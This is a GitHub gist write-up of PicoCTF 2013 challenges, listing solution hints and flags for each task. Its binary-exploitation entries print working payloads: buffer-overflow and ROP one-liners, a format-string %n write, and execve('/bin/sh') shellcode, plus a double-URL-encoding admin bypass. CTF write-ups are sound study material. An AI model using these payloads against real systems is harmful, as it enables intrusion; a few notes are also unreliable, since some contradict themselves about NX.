Skip to content

Instantly share code, notes, and snippets.

@parksjin01

parksjin01/PicoCTF 2013 writeup.md

Last active July 26, 2021 22:22
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save parksjin01/2982f57cbbf47c413c048f91535a04cd to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save parksjin01/2982f57cbbf47c413c048f91535a04cd to your computer and use it in GitHub Desktop.
Download ZIP
PicoCTF 2013 writeup
Raw
PicoCTF 2013 writeup.md

Failure to boot

  • Googling Error 0x00000023 you can find it occur in FAT format system
  • flag FAT

Technician Challenge

  • Googling first unlocked iphone traded we can find some young student hack iphone and get car for reward.
  • flag Nissan 350Z

Read the manual

  • Just do caesar decrypt
  • flag idugnihnpwpw

XMLOL

  • It's easy just see xml source code in web browser
  • flag: 374515637751691555272132255481

First contact

  • Just open pcap with wireshark follow it.
  • position is 37 14'06"N 115 48'40"W
  • flag: 37 14'06"N 115 48'40"W

Trivial

  • Make script to decrypt it
  • flag: th4ts_w0rs3_th4n_DES
  • Script is at here

Bitwise

  • Just make python script to reverse it.
  • flag: ub3rs3cr3t
  • Script is at here

Space portmap

  • I'm so lazy to analysis this gif. I just recode video to see key
  • flag: key: Do passports let you fly interstellar?

Yummy

  • See html source code with web browser
  • It saids set Cookie like authorization=administrator
  • flag: DX7-2

CFG to C

  • It's just assembly problem
  • flag: BCAD

Byte Code

  • If you try to decompile class file with jd-gui it will return // internal error //
  • Instead of jd-gui I used javadecompilers.com
  • flag: LBuJyIiigs

NAVSAT

  • You may download zip file from pico ctf homepage. but we can't unzip it.
  • Hint give file magic number list and found 03 04 is kind of zip file magic number
  • So we should change ?? to PK and unzip. We can get pdf file and txt file
  • flag: Next stop Tau Eridani

RSA

  • I searched RSA, and get proper source code to decode it
  • flag: 5577446633554466577768879988
  • Script is at here

Spamcarver

  • Just open it with hex editor. You can see PK which is file maigc number of zip.
  • I copied hex from 0xcb8e to end and save it as zip file
  • flag: 7adf6f07e0810003c585a7be97868a90

Client-side is the best side

Robomunication

  • If we listen mp3 file, we can only hear BBee and BOO
  • This is morse encoding and we can decode it by just googling.
  • flag: BOOPBEEP

Python-eval1

  • Read html doc first. Then we can know input method also get formular for input.
  • If we make y / 6 + 7 - y == x this comparision correct so I input it.
  • x:0, y:(42-6*(ord(flag[0])*ord(flag[1])))/5
  • flag: eval_is_best_thing_evar

Second contact

  • I couldn't find how to solve this problem so googled it.
  • If you analyze pcap with wireshark, you can find he read about stack magazine
  • I couldn't find what's the flag in this but flag was author of magazine;;;
  • flag: Aleph One

DDOS Detection

  • If you open pcap file with wireshark you can see strange packets.
  • Client send packet to Server but Server doesn't send response
  • I can't make sure they are attackers or just victims but I guess it's just attackers.
  • flag: Them

PHP2

  • They are really kind, they open php source code for that page.
  • If id parameter is 'admin' then authentication is maked
  • But ereg function check id is admin so we can't put it directly, After check ereg then it change urldecoding again.
  • If we encode 'admin' two times like %2561%2564%256d%2569%256e we can get key
  • flag: b4cc845aa05ed9b0ce823cb04f253e27

avaJ

  • Wahaha Java again. Just use same website which we used at Byte code problem
  • flag: iT6chiweTohy4oot

hotcoffe

  • Wahaha Java again. Use same website again.
  • flag: n0th1ng_1s_saf3

overflow1

  • It's really easy prob. Change 65th char to 1.
  • Like this $(python -c 'print "a"*64+"\x01"')
  • flag: overflow_is_best_flow

rop1

  • If ASLR is turned on heap, stack ... kind of memory's address change everytime.
  • However code area doesn't change and there are function to call in code area
  • payload: (python -c 'print "a"*0x8c+"\xa4\x84\x04\x08"';cat) | ./rop1
  • flag: Can't access shell so I don't know flag

Eval python2

  • If we type flag[i:i+5] we can get flag
  • flag: i_are_a_pyeval_mastermind

format1

  • Just use fsb it's easy problem
  • payload: (python -c 'print "\x2a\xa0\x04\x08"*2+"%10x"*9+"%262046c"+"%n"';cat) | ./format1
  • flag: Can't access shell so I don't know flag

overflow2

  • It's really easy too. Similar with overflow1
  • payload: $(python -c 'print "aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrsssstttt\x01"')
  • flag: Can't access shell so I don't know flag

Evergreen

  • This is class file so I used javadecompilers.com

  • In HexGame class if ((s[0] == 6962645667329216838L) && (s[1] == -9213219107527098271L) && (s[2] == -8636705539236951775L) && (s[3] == 1301971326710323201L)) { System.out.println("Success! Your key is on the next line."); System.out.println(stateString());

  • Now I want to find stateString() method private String stateString() { String s = ""; for (Hexagon[] row : this.board) { for (Hexagon hex : row) { if (hex != null) { if (hex.team == 0) { s = s + "1"; } else if (hex.team == 1) s = s + "2"; else s = s + "0"; } } } return s; }

  • If we want to calc we have to know about team and it's related with serializedState method. Result is related with team so we can re-calc by that function

  • flag: 1202202010201002012221020011001220120001200010202100102002100001201021001010000210201002021001012000012000220200120001012020102

ROP2

  • We can solve it if we remember how assembly pass argument to function.
  • This is x86 program so argument is passed by stack.
  • distance of ret value is 140 so 140th value is ret address, next can be argument of system function.
  • payload: (python -c 'print "\x10\x86\x04\x08"*35+"\xb1\x84\x04\x08"+"\x10\x86\x04\x08"*10';cat) | ./rop2
  • flag: I can't access to shell so I don't know flag

Overflow3

  • It's just simple overflow function so do it.
  • Change saved eip value to 0x80485f8
  • payload: $(python -c 'print "aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssss\xf8\x85\x04\x08"')
  • flag: I can't access shell so I don't know shell

ROP3

  • It saids in real contest aslr was turned off, so I'll also turn of aslr
  • If aslr turned off then it's easy overflow prob
  • payload: (python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"a"*(0x8c-28)+"\xa0\xd5\xff\xff"';cat)
  • If you try that you can't get flag because NX bit is enabled, so we can't run shellcode at stack.
  • I'll solve another way in fast time.

Overflow4

  • It's also just simple overflow prob.
  • We don't have to bypass aslr, so I turned off aslr.
  • payload: $(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"+"a"*(0x48-24)+"\x80\xd5\xff\xff"')
  • shellcode: here
  • flag: I don't know flag because can't access shell

Format2

  • I will change exit function got to system function
  • I have to study more about it.

Overflow5

  • It's not that hard, only difference is just no c source code file is provided
  • NX is enabled which means we can run shellcode on stack.
  • I'll call system in library
  • ASLR was turned off at contest so I'll turn off it
  • payload: $(python -c 'print "a"*(0x568-0x140-28)+"\xa0\xcd\xe3\xf7"+"aaaa"+"\x2b\xd8\xf5\xf7"')
  • flag: Can't access shell so I don't know flag

Total Score = 3385

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment